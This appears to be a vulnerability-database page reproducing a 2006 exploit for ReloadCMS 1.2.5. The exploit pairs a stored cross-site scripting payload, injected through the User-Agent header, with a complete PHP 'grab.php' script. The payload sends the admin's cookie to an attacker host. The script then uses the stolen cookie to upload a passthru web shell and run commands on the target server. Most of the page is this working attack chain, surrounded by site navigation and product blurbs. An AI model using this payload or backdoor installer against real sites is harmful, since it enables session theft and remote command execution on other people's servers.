Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ReloadCMS-1.2.5.txt

🗓️ 11 Apr 2006 00:00:00Reported by rgodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

ReloadCMS 1.2.5stable XSS and Remote Command Executio

Code
`<?php  
/*  
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution  
  
software site: http://reloadcms.com/  
description: "ReloadCMS is a free CMS written on PHP and based on flat files."  
  
vulnerability:  
ReloadCMS do not properly sanitize User-Agent request header before to store it  
in stats.dat file.  
Example of attack, through netcat:  
  
rgod>nc target.host.com 80  
GET /path_to_reloadcms/ HTTP/1.0  
User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script>  
Host: target.host.com  
Connection: Close  
  
So, when admin see site statistics through the administration panel, javascript  
will run  
  
Once grab.php script captures admin cookie, the script itself can upload a shell  
trough file manager, launch commands and write output to a logfile also, inside  
cookies, there is admin MD5 password hash  
  
rgod  
mail: [email protected]  
site: http://retrogod.altervista.org  
*/  
  
#--------------------------------grab.php---------------------------------------  
#cookie grabber / backdoor install  
  
$cmd="uname -a"; //a shell command, leave empty to lauch commands later through suntzu.php  
$proxy=""; //you can use a proxy (ip:port), otherwise leave empty  
$logfile="log.txt";  
$filename="suntzu.php"; //shell filename  
  
error_reporting(0);  
ignore_user_abort(1);  
ini_set("max_execution_time",0);  
  
//log referer and cookies  
$fp=fopen($logfile,"a");  
fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n");  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
die;  
}  
$parts=explode(':',$proxy);  
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);  
}  
  
$temp=explode("/",$_GET['ref']);  
$host=$temp[2];  
$path="";  
if (count($temp)>4)  
{  
for ($i=3; $i<=count($temp)-2; $i++)  
{$path.="/".$temp[$i];}  
}  
$path.="/";  
$port=80;  
  
#step 1 -> Get full application path, it is inside html, you need this to upload a shell  
$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Cookie: ".$_GET[c].";\r\n";  
$packet.="Connection: Close\r\n\r\n";  
sendpacketii($packet);  
  
#step 2 -> Upload the evil code  
$temp=explode('name="path" value="',$html);  
$temp2=explode("\"",$temp[1]);  
$fullpath=$temp2[0];  
$shell='<?php error_reporting(0);ini_set("max_execution_time",0);if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}passthru($_GET[cmd]);?>';  
$data="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n";  
$data.="Content-Type:\r\n\r\n";  
$data.="$shell\r\n";  
$data.="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n";  
$data.="$fullpath\r\n";  
$data.="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n";  
$data.="Upload\r\n";  
$data.="-----------------------------7d529a1d23092a--\r\n";  
$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";  
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";  
$packet.="User-Agent: Googlebot/2.1\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Cookie: ".$_GET[c].";\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
#step 3 -> launch commands  
$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
sendpacketii($packet);  
  
//log output  
fputs($fp,"suntzu>".$cmd."\r\n");  
fputs($fp,"\r\n".$html."\r\n");  
fclose($fp);  
header ("Location: ".$_GET['ref']);  
?>  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Apr 2006 00:00Current
7.4High risk
Vulners AI Score7.4
reloadcmsphpflat filesuser-agentrequest headerstats.datnetcatadmin paneljavascriptgrab.php scriptcookieshellfile managercommand executionlogfilemd5 password hashuname -a.
22